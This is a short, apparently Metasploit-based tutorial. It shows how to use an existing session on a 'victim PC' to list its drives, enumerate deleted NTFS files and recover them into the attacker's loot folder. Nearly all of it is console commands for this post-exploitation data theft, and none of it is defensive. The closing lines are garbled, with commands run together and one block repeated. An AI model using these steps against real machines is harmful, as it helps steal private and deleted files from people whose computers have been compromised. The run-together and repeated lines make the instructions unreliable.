This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. “PNG”) to recover deleted files with that extension. Or set FILES to a command separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).
Run the following command to list all the drives of victim PC
Now type 1 = background
Now type 2 = use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit
Run the following command to recover the deleted data of the Victim PC
(I am using E: drive in my case)
Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive E:
msf exploit (recovery_files)>exploit
Run the following command to save the deleted data on /root/.msf4/loot
Set files ID
(Exp: Set files 1073775554)
Set files 1073775554Set files 1073788888
Or
Set files ID,ID,ID
Set files 1073775554Set files 1073788888
Or
Set files ID,ID,ID
EXP:Set files 1073775554,1073788888,1073222212
